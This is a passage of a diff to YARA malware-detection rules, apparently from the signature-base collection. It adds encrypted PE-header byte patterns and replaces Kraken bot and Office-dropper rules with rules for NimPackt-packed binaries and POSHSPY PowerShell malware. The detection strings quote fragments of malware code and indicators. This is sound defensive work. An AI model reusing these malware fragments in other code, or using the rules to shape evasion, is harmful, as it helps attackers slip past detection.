+		$encrypted_pe_header_shift_67 = { 3f fc 43 90 9d d3 43 46 43 43 43 c5 47 43 73 42 42 43 }
+		$encrypted_pe_header_shift_68 = { 40 fd 44 91 9e d4 44 47 44 44 44 c6 48 44 74 43 43 44 }
+		$encrypted_pe_header_shift_69 = { 41 fe 45 92 9f d5 45 48 45 45 45 c7 49 45 75 44 44 45 }
+		$encrypted_pe_header_shift_70 = { 42 ff 46 93 a0 d6 46 49 46 46 46 c8 4a 46 76 45 45 46 }
+		$encrypted_pe_header_shift_71 = { 43 00 47 94 a1 d7 47 4a 47 47 47 c9 4b 47 77 46 46 47 }
+		$encrypted_pe_header_shift_72 = { 44 01 48 95 a2 d8 48 4b 48 48 48 ca 4c 48 78 47 47 48 }
+		$encrypted_pe_header_shift_73 = { 45 02 49 96 a3 d9 49 4c 49 49 49 cb 4d 49 79 48 48 49 }
+		$encrypted_pe_header_shift_74 = { 46 03 4a 97 a4 da 4a 4d 4a 4a 4a cc 4e 4a 7a 49 49 4a }
+		$encrypted_pe_header_shift_75 = { 47 04 4b 98 a5 db 4b 4e 4b 4b 4b cd 4f 4b 7b 4a 4a 4b }
+		$encrypted_pe_header_shift_76 = { 48 05 4c 99 a6 dc 4c 4f 4c 4c 4c ce 50 4c 7c 4b 4b 4c }
+		$encrypted_pe_header_shift_77 = { 49 06 4d 9a a7 dd 4d 50 4d 4d 4d cf 51 4d 7d 4c 4c 4d }
+		$encrypted_pe_header_shift_78 = { 4a 07 4e 9b a8 de 4e 51 4e 4e 4e d0 52 4e 7e 4d 4d 4e }
+		$encrypted_pe_header_shift_79 = { 4b 08 4f 9c a9 df 4f 52 4f 4f 4f d1 53 4f 7f 4e 4e 4f }
+		$encrypted_pe_header_shift_80 = { 4c 09 50 9d aa e0 50 53 50 50 50 d2 54 50 80 4f 4f 50 }
+		$encrypted_pe_header_shift_81 = { 4d 0a 51 9e ab e1 51 54 51 51 51 d3 55 51 81 50 50 51 }
+		$encrypted_pe_header_shift_82 = { 4e 0b 52 9f ac e2 52 55 52 52 52 d4 56 52 82 51 51 52 }
+		$encrypted_pe_header_shift_83 = { 4f 0c 53 a0 ad e3 53 56 53 53 53 d5 57 53 83 52 52 53 }
+		$encrypted_pe_header_shift_84 = { 50 0d 54 a1 ae e4 54 57 54 54 54 d6 58 54 84 53 53 54 }
+		$encrypted_pe_header_shift_85 = { 51 0e 55 a2 af e5 55 58 55 55 55 d7 59 55 85 54 54 55 }
+		$encrypted_pe_header_shift_86 = { 52 0f 56 a3 b0 e6 56 59 56 56 56 d8 5a 56 86 55 55 56 }
+		$encrypted_pe_header_shift_87 = { 53 10 57 a4 b1 e7 57 5a 57 57 57 d9 5b 57 87 56 56 57 }
+		$encrypted_pe_header_shift_88 = { 54 11 58 a5 b2 e8 58 5b 58 58 58 da 5c 58 88 57 57 58 }
+		$encrypted_pe_header_shift_89 = { 55 12 59 a6 b3 e9 59 5c 59 59 59 db 5d 59 89 58 58 59 }
+		$encrypted_pe_header_shift_90 = { 56 13 5a a7 b4 ea 5a 5d 5a 5a 5a dc 5e 5a 8a 59 59 5a }
+		$encrypted_pe_header_shift_91 = { 57 14 5b a8 b5 eb 5b 5e 5b 5b 5b dd 5f 5b 8b 5a 5a 5b }
+		$encrypted_pe_header_shift_92 = { 58 15 5c a9 b6 ec 5c 5f 5c 5c 5c de 60 5c 8c 5b 5b 5c }
+		$encrypted_pe_header_shift_93 = { 59 16 5d aa b7 ed 5d 60 5d 5d 5d df 61 5d 8d 5c 5c 5d }
+		$encrypted_pe_header_shift_94 = { 5a 17 5e ab b8 ee 5e 61 5e 5e 5e e0 62 5e 8e 5d 5d 5e }
+		$encrypted_pe_header_shift_95 = { 5b 18 5f ac b9 ef 5f 62 5f 5f 5f e1 63 5f 8f 5e 5e 5f }
+		$encrypted_pe_header_shift_96 = { 5c 19 60 ad ba f0 60 63 60 60 60 e2 64 60 90 5f 5f 60 }
+		$encrypted_pe_header_shift_97 = { 5d 1a 61 ae bb f1 61 64 61 61 61 e3 65 61 91 60 60 61 }
+		$encrypted_pe_header_shift_98 = { 5e 1b 62 af bc f2 62 65 62 62 62 e4 66 62 92 61 61 62 }
+		$encrypted_pe_header_shift_99 = { 5f 1c 63 b0 bd f3 63 66 63 63 63 e5 67 63 93 62 62 63 }
+		$encrypted_pe_header_shift_100 = { 60 1d 64 b1 be f4 64 67 64 64 64 e6 68 64 94 63 63 64 }
+		$encrypted_pe_header_shift_101 = { 61 1e 65 b2 bf f5 65 68 65 65 65 e7 69 65 95 64 64 65 }
+		$encrypted_pe_header_shift_102 = { 62 1f 66 b3 c0 f6 66 69 66 66 66 e8 6a 66 96 65 65 66 }
+		$encrypted_pe_header_shift_103 = { 63 20 67 b4 c1 f7 67 6a 67 67 67 e9 6b 67 97 66 66 67 }
+		$encrypted_pe_header_shift_104 = { 64 21 68 b5 c2 f8 68 6b 68 68 68 ea 6c 68 98 67 67 68 }
+		$encrypted_pe_header_shift_105 = { 65 22 69 b6 c3 f9 69 6c 69 69 69 eb 6d 69 99 68 68 69 }
+		$encrypted_pe_header_shift_106 = { 66 23 6a b7 c4 fa 6a 6d 6a 6a 6a ec 6e 6a 9a 69 69 6a }
+		$encrypted_pe_header_shift_107 = { 67 24 6b b8 c5 fb 6b 6e 6b 6b 6b ed 6f 6b 9b 6a 6a 6b }
+		$encrypted_pe_header_shift_108 = { 68 25 6c b9 c6 fc 6c 6f 6c 6c 6c ee 70 6c 9c 6b 6b 6c }
+		$encrypted_pe_header_shift_109 = { 69 26 6d ba c7 fd 6d 70 6d 6d 6d ef 71 6d 9d 6c 6c 6d }
+		$encrypted_pe_header_shift_110 = { 6a 27 6e bb c8 fe 6e 71 6e 6e 6e f0 72 6e 9e 6d 6d 6e }
+		$encrypted_pe_header_shift_111 = { 6b 28 6f bc c9 ff 6f 72 6f 6f 6f f1 73 6f 9f 6e 6e 6f }
+		$encrypted_pe_header_shift_112 = { 6c 29 70 bd ca 00 70 73 70 70 70 f2 74 70 a0 6f 6f 70 }
+		$encrypted_pe_header_shift_113 = { 6d 2a 71 be cb 01 71 74 71 71 71 f3 75 71 a1 70 70 71 }
+		$encrypted_pe_header_shift_114 = { 6e 2b 72 bf cc 02 72 75 72 72 72 f4 76 72 a2 71 71 72 }
+		$encrypted_pe_header_shift_115 = { 6f 2c 73 c0 cd 03 73 76 73 73 73 f5 77 73 a3 72 72 73 }
+		$encrypted_pe_header_shift_116 = { 70 2d 74 c1 ce 04 74 77 74 74 74 f6 78 74 a4 73 73 74 }
+		$encrypted_pe_header_shift_117 = { 71 2e 75 c2 cf 05 75 78 75 75 75 f7 79 75 a5 74 74 75 }
+		$encrypted_pe_header_shift_118 = { 72 2f 76 c3 d0 06 76 79 76 76 76 f8 7a 76 a6 75 75 76 }
+		$encrypted_pe_header_shift_119 = { 73 30 77 c4 d1 07 77 7a 77 77 77 f9 7b 77 a7 76 76 77 }
+		$encrypted_pe_header_shift_120 = { 74 31 78 c5 d2 08 78 7b 78 78 78 fa 7c 78 a8 77 77 78 }
+		$encrypted_pe_header_shift_121 = { 75 32 79 c6 d3 09 79 7c 79 79 79 fb 7d 79 a9 78 78 79 }
+		$encrypted_pe_header_shift_122 = { 76 33 7a c7 d4 0a 7a 7d 7a 7a 7a fc 7e 7a aa 79 79 7a }
+		$encrypted_pe_header_shift_123 = { 77 34 7b c8 d5 0b 7b 7e 7b 7b 7b fd 7f 7b ab 7a 7a 7b }
+		$encrypted_pe_header_shift_124 = { 78 35 7c c9 d6 0c 7c 7f 7c 7c 7c fe 80 7c ac 7b 7b 7c }
+		$encrypted_pe_header_shift_125 = { 79 36 7d ca d7 0d 7d 80 7d 7d 7d ff 81 7d ad 7c 7c 7d }
+		$encrypted_pe_header_shift_126 = { 7a 37 7e cb d8 0e 7e 81 7e 7e 7e 00 82 7e ae 7d 7d 7e }
+		$encrypted_pe_header_shift_127 = { 7b 38 7f cc d9 0f 7f 82 7f 7f 7f 01 83 7f af 7e 7e 7f }
+		$encrypted_pe_header_shift_128 = { 7c 39 80 cd da 10 80 83 80 80 80 02 84 80 b0 7f 7f 80 }
+		$encrypted_pe_header_shift_129 = { 7d 3a 81 ce db 11 81 84 81 81 81 03 85 81 b1 80 80 81 }
+		$encrypted_pe_header_shift_130 = { 7e 3b 82 cf dc 12 82 85 82 82 82 04 86 82 b2 81 81 82 }
+		$encrypted_pe_header_shift_131 = { 7f 3c 83 d0 dd 13 83 86 83 83 83 05 87 83 b3 82 82 83 }
+		$encrypted_pe_header_shift_132 = { 80 3d 84 d1 de 14 84 87 84 84 84 06 88 84 b4 83 83 84 }
+		$encrypted_pe_header_shift_133 = { 81 3e 85 d2 df 15 85 88 85 85 85 07 89 85 b5 84 84 85 }
+		$encrypted_pe_header_shift_134 = { 82 3f 86 d3 e0 16 86 89 86 86 86 08 8a 86 b6 85 85 86 }
+		$encrypted_pe_header_shift_135 = { 83 40 87 d4 e1 17 87 8a 87 87 87 09 8b 87 b7 86 86 87 }
+		$encrypted_pe_header_shift_136 = { 84 41 88 d5 e2 18 88 8b 88 88 88 0a 8c 88 b8 87 87 88 }
+		$encrypted_pe_header_shift_137 = { 85 42 89 d6 e3 19 89 8c 89 89 89 0b 8d 89 b9 88 88 89 }
+		$encrypted_pe_header_shift_138 = { 86 43 8a d7 e4 1a 8a 8d 8a 8a 8a 0c 8e 8a ba 89 89 8a }
+		$encrypted_pe_header_shift_139 = { 87 44 8b d8 e5 1b 8b 8e 8b 8b 8b 0d 8f 8b bb 8a 8a 8b }
+		$encrypted_pe_header_shift_140 = { 88 45 8c d9 e6 1c 8c 8f 8c 8c 8c 0e 90 8c bc 8b 8b 8c }
+		$encrypted_pe_header_shift_141 = { 89 46 8d da e7 1d 8d 90 8d 8d 8d 0f 91 8d bd 8c 8c 8d }
+		$encrypted_pe_header_shift_142 = { 8a 47 8e db e8 1e 8e 91 8e 8e 8e 10 92 8e be 8d 8d 8e }
+		$encrypted_pe_header_shift_143 = { 8b 48 8f dc e9 1f 8f 92 8f 8f 8f 11 93 8f bf 8e 8e 8f }
+		$encrypted_pe_header_shift_144 = { 8c 49 90 dd ea 20 90 93 90 90 90 12 94 90 c0 8f 8f 90 }
+		$encrypted_pe_header_shift_145 = { 8d 4a 91 de eb 21 91 94 91 91 91 13 95 91 c1 90 90 91 }
+		$encrypted_pe_header_shift_146 = { 8e 4b 92 df ec 22 92 95 92 92 92 14 96 92 c2 91 91 92 }
+		$encrypted_pe_header_shift_147 = { 8f 4c 93 e0 ed 23 93 96 93 93 93 15 97 93 c3 92 92 93 }
+		$encrypted_pe_header_shift_148 = { 90 4d 94 e1 ee 24 94 97 94 94 94 16 98 94 c4 93 93 94 }
+		$encrypted_pe_header_shift_149 = { 91 4e 95 e2 ef 25 95 98 95 95 95 17 99 95 c5 94 94 95 }
+		$encrypted_pe_header_shift_150 = { 92 4f 96 e3 f0 26 96 99 96 96 96 18 9a 96 c6 95 95 96 }
+		$encrypted_pe_header_shift_151 = { 93 50 97 e4 f1 27 97 9a 97 97 97 19 9b 97 c7 96 96 97 }
+		$encrypted_pe_header_shift_152 = { 94 51 98 e5 f2 28 98 9b 98 98 98 1a 9c 98 c8 97 97 98 }
+		$encrypted_pe_header_shift_153 = { 95 52 99 e6 f3 29 99 9c 99 99 99 1b 9d 99 c9 98 98 99 }
+		$encrypted_pe_header_shift_154 = { 96 53 9a e7 f4 2a 9a 9d 9a 9a 9a 1c 9e 9a ca 99 99 9a }
+		$encrypted_pe_header_shift_155 = { 97 54 9b e8 f5 2b 9b 9e 9b 9b 9b 1d 9f 9b cb 9a 9a 9b }
+		$encrypted_pe_header_shift_156 = { 98 55 9c e9 f6 2c 9c 9f 9c 9c 9c 1e a0 9c cc 9b 9b 9c }
+		$encrypted_pe_header_shift_157 = { 99 56 9d ea f7 2d 9d a0 9d 9d 9d 1f a1 9d cd 9c 9c 9d }
+		$encrypted_pe_header_shift_158 = { 9a 57 9e eb f8 2e 9e a1 9e 9e 9e 20 a2 9e ce 9d 9d 9e }
+		$encrypted_pe_header_shift_159 = { 9b 58 9f ec f9 2f 9f a2 9f 9f 9f 21 a3 9f cf 9e 9e 9f }
+		$encrypted_pe_header_shift_160 = { 9c 59 a0 ed fa 30 a0 a3 a0 a0 a0 22 a4 a0 d0 9f 9f a0 }
+		$encrypted_pe_header_shift_161 = { 9d 5a a1 ee fb 31 a1 a4 a1 a1 a1 23 a5 a1 d1 a0 a0 a1 }
+		$encrypted_pe_header_shift_162 = { 9e 5b a2 ef fc 32 a2 a5 a2 a2 a2 24 a6 a2 d2 a1 a1 a2 }
+		$encrypted_pe_header_shift_163 = { 9f 5c a3 f0 fd 33 a3 a6 a3 a3 a3 25 a7 a3 d3 a2 a2 a3 }
+		$encrypted_pe_header_shift_164 = { a0 5d a4 f1 fe 34 a4 a7 a4 a4 a4 26 a8 a4 d4 a3 a3 a4 }
+		$encrypted_pe_header_shift_165 = { a1 5e a5 f2 ff 35 a5 a8 a5 a5 a5 27 a9 a5 d5 a4 a4 a5 }
+		$encrypted_pe_header_shift_166 = { a2 5f a6 f3 00 36 a6 a9 a6 a6 a6 28 aa a6 d6 a5 a5 a6 }
+		$encrypted_pe_header_shift_167 = { a3 60 a7 f4 01 37 a7 aa a7 a7 a7 29 ab a7 d7 a6 a6 a7 }
+		$encrypted_pe_header_shift_168 = { a4 61 a8 f5 02 38 a8 ab a8 a8 a8 2a ac a8 d8 a7 a7 a8 }
+		$encrypted_pe_header_shift_169 = { a5 62 a9 f6 03 39 a9 ac a9 a9 a9 2b ad a9 d9 a8 a8 a9 }
+		$encrypted_pe_header_shift_170 = { a6 63 aa f7 04 3a aa ad aa aa aa 2c ae aa da a9 a9 aa }
+		$encrypted_pe_header_shift_171 = { a7 64 ab f8 05 3b ab ae ab ab ab 2d af ab db aa aa ab }
+		$encrypted_pe_header_shift_172 = { a8 65 ac f9 06 3c ac af ac ac ac 2e b0 ac dc ab ab ac }
+		$encrypted_pe_header_shift_173 = { a9 66 ad fa 07 3d ad b0 ad ad ad 2f b1 ad dd ac ac ad }
+		$encrypted_pe_header_shift_174 = { aa 67 ae fb 08 3e ae b1 ae ae ae 30 b2 ae de ad ad ae }
+		$encrypted_pe_header_shift_175 = { ab 68 af fc 09 3f af b2 af af af 31 b3 af df ae ae af }
+		$encrypted_pe_header_shift_176 = { ac 69 b0 fd 0a 40 b0 b3 b0 b0 b0 32 b4 b0 e0 af af b0 }
+		$encrypted_pe_header_shift_177 = { ad 6a b1 fe 0b 41 b1 b4 b1 b1 b1 33 b5 b1 e1 b0 b0 b1 }
+		$encrypted_pe_header_shift_178 = { ae 6b b2 ff 0c 42 b2 b5 b2 b2 b2 34 b6 b2 e2 b1 b1 b2 }
+		$encrypted_pe_header_shift_179 = { af 6c b3 00 0d 43 b3 b6 b3 b3 b3 35 b7 b3 e3 b2 b2 b3 }
+		$encrypted_pe_header_shift_180 = { b0 6d b4 01 0e 44 b4 b7 b4 b4 b4 36 b8 b4 e4 b3 b3 b4 }
+		$encrypted_pe_header_shift_181 = { b1 6e b5 02 0f 45 b5 b8 b5 b5 b5 37 b9 b5 e5 b4 b4 b5 }
+		$encrypted_pe_header_shift_182 = { b2 6f b6 03 10 46 b6 b9 b6 b6 b6 38 ba b6 e6 b5 b5 b6 }
+		$encrypted_pe_header_shift_183 = { b3 70 b7 04 11 47 b7 ba b7 b7 b7 39 bb b7 e7 b6 b6 b7 }
+		$encrypted_pe_header_shift_184 = { b4 71 b8 05 12 48 b8 bb b8 b8 b8 3a bc b8 e8 b7 b7 b8 }
+		$encrypted_pe_header_shift_185 = { b5 72 b9 06 13 49 b9 bc b9 b9 b9 3b bd b9 e9 b8 b8 b9 }
+		$encrypted_pe_header_shift_186 = { b6 73 ba 07 14 4a ba bd ba ba ba 3c be ba ea b9 b9 ba }
+		$encrypted_pe_header_shift_187 = { b7 74 bb 08 15 4b bb be bb bb bb 3d bf bb eb ba ba bb }
+		$encrypted_pe_header_shift_188 = { b8 75 bc 09 16 4c bc bf bc bc bc 3e c0 bc ec bb bb bc }
+		$encrypted_pe_header_shift_189 = { b9 76 bd 0a 17 4d bd c0 bd bd bd 3f c1 bd ed bc bc bd }
+		$encrypted_pe_header_shift_190 = { ba 77 be 0b 18 4e be c1 be be be 40 c2 be ee bd bd be }
+		$encrypted_pe_header_shift_191 = { bb 78 bf 0c 19 4f bf c2 bf bf bf 41 c3 bf ef be be bf }
+		$encrypted_pe_header_shift_192 = { bc 79 c0 0d 1a 50 c0 c3 c0 c0 c0 42 c4 c0 f0 bf bf c0 }
+		$encrypted_pe_header_shift_193 = { bd 7a c1 0e 1b 51 c1 c4 c1 c1 c1 43 c5 c1 f1 c0 c0 c1 }
+		$encrypted_pe_header_shift_194 = { be 7b c2 0f 1c 52 c2 c5 c2 c2 c2 44 c6 c2 f2 c1 c1 c2 }
+		$encrypted_pe_header_shift_195 = { bf 7c c3 10 1d 53 c3 c6 c3 c3 c3 45 c7 c3 f3 c2 c2 c3 }
+		$encrypted_pe_header_shift_196 = { c0 7d c4 11 1e 54 c4 c7 c4 c4 c4 46 c8 c4 f4 c3 c3 c4 }
+		$encrypted_pe_header_shift_197 = { c1 7e c5 12 1f 55 c5 c8 c5 c5 c5 47 c9 c5 f5 c4 c4 c5 }
+		$encrypted_pe_header_shift_198 = { c2 7f c6 13 20 56 c6 c9 c6 c6 c6 48 ca c6 f6 c5 c5 c6 }
+		$encrypted_pe_header_shift_199 = { c3 80 c7 14 21 57 c7 ca c7 c7 c7 49 cb c7 f7 c6 c6 c7 }
+		$encrypted_pe_header_shift_200 = { c4 81 c8 15 22 58 c8 cb c8 c8 c8 4a cc c8 f8 c7 c7 c8 }
+		$encrypted_pe_header_shift_201 = { c5 82 c9 16 23 59 c9 cc c9 c9 c9 4b cd c9 f9 c8 c8 c9 }
+		$encrypted_pe_header_shift_202 = { c6 83 ca 17 24 5a ca cd ca ca ca 4c ce ca fa c9 c9 ca }
+		$encrypted_pe_header_shift_203 = { c7 84 cb 18 25 5b cb ce cb cb cb 4d cf cb fb ca ca cb }
+		$encrypted_pe_header_shift_204 = { c8 85 cc 19 26 5c cc cf cc cc cc 4e d0 cc fc cb cb cc }
+		$encrypted_pe_header_shift_205 = { c9 86 cd 1a 27 5d cd d0 cd cd cd 4f d1 cd fd cc cc cd }
+		$encrypted_pe_header_shift_206 = { ca 87 ce 1b 28 5e ce d1 ce ce ce 50 d2 ce fe cd cd ce }
+		$encrypted_pe_header_shift_207 = { cb 88 cf 1c 29 5f cf d2 cf cf cf 51 d3 cf ff ce ce cf }
+		$encrypted_pe_header_shift_208 = { cc 89 d0 1d 2a 60 d0 d3 d0 d0 d0 52 d4 d0 00 cf cf d0 }
+		$encrypted_pe_header_shift_209 = { cd 8a d1 1e 2b 61 d1 d4 d1 d1 d1 53 d5 d1 01 d0 d0 d1 }
+		$encrypted_pe_header_shift_210 = { ce 8b d2 1f 2c 62 d2 d5 d2 d2 d2 54 d6 d2 02 d1 d1 d2 }
+		$encrypted_pe_header_shift_211 = { cf 8c d3 20 2d 63 d3 d6 d3 d3 d3 55 d7 d3 03 d2 d2 d3 }
+		$encrypted_pe_header_shift_212 = { d0 8d d4 21 2e 64 d4 d7 d4 d4 d4 56 d8 d4 04 d3 d3 d4 }
+		$encrypted_pe_header_shift_213 = { d1 8e d5 22 2f 65 d5 d8 d5 d5 d5 57 d9 d5 05 d4 d4 d5 }
+		$encrypted_pe_header_shift_214 = { d2 8f d6 23 30 66 d6 d9 d6 d6 d6 58 da d6 06 d5 d5 d6 }
+		$encrypted_pe_header_shift_215 = { d3 90 d7 24 31 67 d7 da d7 d7 d7 59 db d7 07 d6 d6 d7 }
+		$encrypted_pe_header_shift_216 = { d4 91 d8 25 32 68 d8 db d8 d8 d8 5a dc d8 08 d7 d7 d8 }
+		$encrypted_pe_header_shift_217 = { d5 92 d9 26 33 69 d9 dc d9 d9 d9 5b dd d9 09 d8 d8 d9 }
+		$encrypted_pe_header_shift_218 = { d6 93 da 27 34 6a da dd da da da 5c de da 0a d9 d9 da }
+		$encrypted_pe_header_shift_219 = { d7 94 db 28 35 6b db de db db db 5d df db 0b da da db }
+		$encrypted_pe_header_shift_220 = { d8 95 dc 29 36 6c dc df dc dc dc 5e e0 dc 0c db db dc }
+		$encrypted_pe_header_shift_221 = { d9 96 dd 2a 37 6d dd e0 dd dd dd 5f e1 dd 0d dc dc dd }
+		$encrypted_pe_header_shift_222 = { da 97 de 2b 38 6e de e1 de de de 60 e2 de 0e dd dd de }
+		$encrypted_pe_header_shift_223 = { db 98 df 2c 39 6f df e2 df df df 61 e3 df 0f de de df }
+		$encrypted_pe_header_shift_224 = { dc 99 e0 2d 3a 70 e0 e3 e0 e0 e0 62 e4 e0 10 df df e0 }
+		$encrypted_pe_header_shift_225 = { dd 9a e1 2e 3b 71 e1 e4 e1 e1 e1 63 e5 e1 11 e0 e0 e1 }
+		$encrypted_pe_header_shift_226 = { de 9b e2 2f 3c 72 e2 e5 e2 e2 e2 64 e6 e2 12 e1 e1 e2 }
+		$encrypted_pe_header_shift_227 = { df 9c e3 30 3d 73 e3 e6 e3 e3 e3 65 e7 e3 13 e2 e2 e3 }
+		$encrypted_pe_header_shift_228 = { e0 9d e4 31 3e 74 e4 e7 e4 e4 e4 66 e8 e4 14 e3 e3 e4 }
+		$encrypted_pe_header_shift_229 = { e1 9e e5 32 3f 75 e5 e8 e5 e5 e5 67 e9 e5 15 e4 e4 e5 }
+		$encrypted_pe_header_shift_230 = { e2 9f e6 33 40 76 e6 e9 e6 e6 e6 68 ea e6 16 e5 e5 e6 }
+		$encrypted_pe_header_shift_231 = { e3 a0 e7 34 41 77 e7 ea e7 e7 e7 69 eb e7 17 e6 e6 e7 }
+		$encrypted_pe_header_shift_232 = { e4 a1 e8 35 42 78 e8 eb e8 e8 e8 6a ec e8 18 e7 e7 e8 }
+		$encrypted_pe_header_shift_233 = { e5 a2 e9 36 43 79 e9 ec e9 e9 e9 6b ed e9 19 e8 e8 e9 }
+		$encrypted_pe_header_shift_234 = { e6 a3 ea 37 44 7a ea ed ea ea ea 6c ee ea 1a e9 e9 ea }
+		$encrypted_pe_header_shift_235 = { e7 a4 eb 38 45 7b eb ee eb eb eb 6d ef eb 1b ea ea eb }
+		$encrypted_pe_header_shift_236 = { e8 a5 ec 39 46 7c ec ef ec ec ec 6e f0 ec 1c eb eb ec }
+		$encrypted_pe_header_shift_237 = { e9 a6 ed 3a 47 7d ed f0 ed ed ed 6f f1 ed 1d ec ec ed }
+		$encrypted_pe_header_shift_238 = { ea a7 ee 3b 48 7e ee f1 ee ee ee 70 f2 ee 1e ed ed ee }
+		$encrypted_pe_header_shift_239 = { eb a8 ef 3c 49 7f ef f2 ef ef ef 71 f3 ef 1f ee ee ef }
+		$encrypted_pe_header_shift_240 = { ec a9 f0 3d 4a 80 f0 f3 f0 f0 f0 72 f4 f0 20 ef ef f0 }
+		$encrypted_pe_header_shift_241 = { ed aa f1 3e 4b 81 f1 f4 f1 f1 f1 73 f5 f1 21 f0 f0 f1 }
+		$encrypted_pe_header_shift_242 = { ee ab f2 3f 4c 82 f2 f5 f2 f2 f2 74 f6 f2 22 f1 f1 f2 }
+		$encrypted_pe_header_shift_243 = { ef ac f3 40 4d 83 f3 f6 f3 f3 f3 75 f7 f3 23 f2 f2 f3 }
+		$encrypted_pe_header_shift_244 = { f0 ad f4 41 4e 84 f4 f7 f4 f4 f4 76 f8 f4 24 f3 f3 f4 }
+		$encrypted_pe_header_shift_245 = { f1 ae f5 42 4f 85 f5 f8 f5 f5 f5 77 f9 f5 25 f4 f4 f5 }
+		$encrypted_pe_header_shift_246 = { f2 af f6 43 50 86 f6 f9 f6 f6 f6 78 fa f6 26 f5 f5 f6 }
+		$encrypted_pe_header_shift_247 = { f3 b0 f7 44 51 87 f7 fa f7 f7 f7 79 fb f7 27 f6 f6 f7 }
+		$encrypted_pe_header_shift_248 = { f4 b1 f8 45 52 88 f8 fb f8 f8 f8 7a fc f8 28 f7 f7 f8 }
+		$encrypted_pe_header_shift_249 = { f5 b2 f9 46 53 89 f9 fc f9 f9 f9 7b fd f9 29 f8 f8 f9 }
+		$encrypted_pe_header_shift_250 = { f6 b3 fa 47 54 8a fa fd fa fa fa 7c fe fa 2a f9 f9 fa }
+		$encrypted_pe_header_shift_251 = { f7 b4 fb 48 55 8b fb fe fb fb fb 7d ff fb 2b fa fa fb }
+		$encrypted_pe_header_shift_252 = { f8 b5 fc 49 56 8c fc ff fc fc fc 7e 00 fc 2c fb fb fc }
+		$encrypted_pe_header_shift_253 = { f9 b6 fd 4a 57 8d fd 00 fd fd fd 7f 01 fd 2d fc fc fd }
+		$encrypted_pe_header_shift_254 = { fa b7 fe 4b 58 8e fe 01 fe fe fe 80 02 fe 2e fd fd fe }
+		$encrypted_pe_header_shift_255 = { fb b8 ff 4c 59 8f ff 02 ff ff ff 81 03 ff 2f fe fe ff }
 
 	condition:
-		$h1 at 0 and filesize <= 300KB and $a1 and $v1 and not 1 of ( $fp* )
+		filesize < 200KB and ( 1 of ( $encrypted_pe_header_shift_* ) )
 }
-rule SIGNATURE_BASE_Kraken_Bot_Sample : FILE
+rule SIGNATURE_BASE_HKTL_Nim_Nimpackt : EXE FILE HKTL
 {
 	meta:
-		description = "Kraken Bot Sample - file inf.bin"
-		author = "Florian Roth (Nextron Systems)"
-		id = "508bb581-9dad-5201-af3d-7da17d905dc9"
-		date = "2015-05-07"
+		description = "Detects binaries generated with NimPackt v1"
+		author = "Cas van Cooten"
+		id = "3399d937-133f-5701-840e-eaf68b2f1ec9"
+		date = "2022-01-26"
 		modified = "2023-12-05"
-		reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kraken_bot1.yar#L8-L26"
+		reference = "https://github.com/chvancooten/NimPackt-v1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_nimpackt.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"
-		logic_hash = "2e0f0a981ce3483aad8e48f6a259f9875ea4f8449feb24bafbae07243dd82a16"
-		score = 90
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "2bda7acb440d1c72efeaddcb18b736343d658d59feccf6c9339b313cd35f32eb"
+		score = 80
+		quality = 79
+		tags = "EXE, FILE, HKTL"
 
 	strings:
-		$s2 = "%s=?getname" fullword ascii
-		$s4 = "&COMPUTER=^" fullword ascii
-		$s5 = "xJWFwcGRhdGElAA=" fullword ascii
-		$s8 = "JVdJTkRJUi" fullword ascii
-		$s20 = "btcplug" fullword ascii
+		$nim1 = "fatal.nim" ascii fullword
+		$nim2 = "winim" ascii
+		$np1 = { 4E 69 6D 50 61 63 6B 74 }
+		$sus1 = { 61 6D 73 69 00 00 00 00 B8 57 00 07 80 C3 }
+		$sus2 = { 5B 2B 5D 20 49 6E 6A 65 63 74 65 64 }
+		$sus3 = { 5C 2D 2D 20 62 79 74 65 73 20 77 72 69 74 74 65 6E 3A }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5A4D and filesize < 750KB and 1 of ( $nim* ) and ( $np1 or 2 of ( $sus* ) )
 }
-rule SIGNATURE_BASE_SUSP_Office_Dropper_Strings : FILE
+rule SIGNATURE_BASE_POSHSPY_Malware
 {
 	meta:
-		description = "Detects Office droppers that include a notice to enable active content"
+		description = "Detects"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6560fdf7-46e8-5c16-8263-a36f1dec7868"
-		date = "2018-09-13"
+		id = "7e908efc-0023-5be1-9871-8bfbf8b9e53a"
+		date = "2017-07-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L1-L17"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poshspy.yar#L11-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a66a86eb99a3e7cd02e3444714c6c88b423cd0ea1e6210bf91da01cf804105f"
-		score = 65
+		logic_hash = "e1f8b502950d2f7600041b5492f529682b9f5f2863c36ad40618b5ed78a94567"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "_VBA_PROJECT" wide
-		$s1 = "click enable editing" fullword ascii
-		$s2 = "click enable content" fullword ascii
-		$s3 = "\"Enable Editing\"" fullword ascii
-		$s4 = "\"Enable Content\"" fullword ascii
+		$x1 = "function sWP($cN, $pN, $aK, $aI)" fullword ascii
+		$x2 = "$aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2" ascii
+		$x3 = "(('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len',"
+		$x4 = "$cPairKey = \"BwIAAACkAABSU0EyAAQAAAEAA"
+		$x5 = "$exeRes = exePldRoutine"
+		$x6 = "ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA"
 
 	condition:
